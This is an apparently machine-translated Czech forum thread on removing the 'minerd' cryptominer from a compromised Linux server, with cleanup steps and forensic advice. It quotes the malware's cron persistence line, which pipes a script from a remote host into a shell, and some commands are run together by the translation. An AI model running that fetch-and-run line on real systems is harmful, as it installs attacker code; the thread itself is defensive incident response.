Našel jsem řešení pro odstranění minerd . Měl jsem to štěstí, že jsem našel skutečný skript, který byl použit k infikování mého serveru. Vše, co jsem musel udělat, bylo odstranit prvky umístěné tímto skriptem -
- Na návrh monkeyota jsem zablokoval veškerou komunikaci se serverem těžebního fondu -
iptables -A INPUT -s xmr.crypto-pool.fr -j DROPaiptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP. - Odstraněn cron
*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | shod/var/spool/cron/roota/var/spool/cron/crontabs/root. - Odstraněn adresář
/opt/yam. - Odstraněno
/root/.ssh/KHK75NEOiq. - Smazal soubory
/opt/minerda/opt/KHK75NEOiq33. - Zastavil proces těžby –
pkill minerd. - Zastaveno
lady-service lady stop.
Spustil jsem ps -eo pcpu,args --sort=-%cpu | head , top -bn2 |sed -n '7,25'p a ps aux | grep minerd poté a malware nebyl nikde vidět.
Stále potřebuji zjistit, jak získal přístup do systému, ale podařilo se mi to tímto způsobem zakázat.
Vaším prvním cílem je (pokud nechcete přeinstalovat) určit, jak se tam vůbec podařilo dostat. Pokud byl útočník lstivý, spustili "timestomp", aby upravili data binárních souborů. Minimalizace SSH dělá málo, pokud používáte zranitelnou verzi Wordpressu, Joomly nebo něčeho jiného. Například existoval exploit Nagios, který někdo používal ke spuštění minerdu. Takže cíl... „Určit, co běží, proč to běží a je to zranitelné?“
Za druhé, chcete zablokovat veškerou komunikaci do a ze serveru těžebního fondu:
iptables -A INPUT -S xmr.crypto-pool.fr -j DROP
Jak tedy určíte, co bylo upraveno/změněno/zranitelné? Musíte rozumět svému systému. Co to dělá, proč to dělá a kdo k tomu potřebuje přístup. Prohledal bych své crontabs, abych zjistil, co, jestli něco začíná. Můžete spustit:service --status-all zjistit, jaké služby běží/spouštějí, a prozkoumat je. Zdá se, že /opt/minerd je soubor, kontrolní součet tohoto souboru a můžete vytvořit skript pro hledání čehokoli, co tento soubor volá, nebo jakýchkoli souborů, které se shodují, např.:find / | xargs grep -i minerd nebo find / | xargs grep -i CHECKSUM_of_MINERD (Mějte na paměti, že se jedná o brutální způsob vyhledávání v souborech).
Za třetí, zkontrolujte své protokoly. Pokud používáte webový server, začal bych s protokoly chyb (error_logs) a hledal bych více 403 a 404 z adresy následované úspěšným připojením v access_log. Zkontrolujte cestu, která byla přijata (např. 200:/var/www/nagios_or_something_vulnerable/config.php) a podívejte se do adresáře. Existuje mnoho přístupů k nalezení těchto informací, ale NIKDO vám zde nemůže poskytnout úplnou odpověď, protože informace můžeme odvodit pouze na základě omezeného množství informací, které zveřejníte.
"Mám soubor s názvem minerd začíná!" Vykopejte ten soubor. (find /|xargs grep -i minerd ). "Používá ten divný provázek!" (find / |xargs grep -i 47TS1NQvebb3Feq ). "Vytváří připojení k portu 8080!" (lsof -i | awk '/8080|http-alt/{print $1"\t"$2"\t"$8"\t"$9}' ). "Připojuje se k této adrese!" (lsof -i | grep xmr.crypto ... Nyní máte základní přehled věcí, které můžete udělat.
Problém je v tom, že těžař je pravděpodobně náklad nějakého (jiného) malwaru, takže vlastně nemůžete říct, co ještě bylo v systému kompromitováno. Je možné, že v systému není nic jiného rezidenta a vy jste jen znovu infikováni pokaždé, když zabijete těžaře.
Alternativně existuje nějaký proces správy/kapky, který otevřel zadní vrátka na váš server.
Nejbezpečnější sázkou je znovu vytvořit server. Pokud jej však chcete oskenovat, můžete zdarma získat Sophos Anti-Virus z https://www.sophos.com/en-us/products/free-tools/sophos-antivirus-for-linux.aspx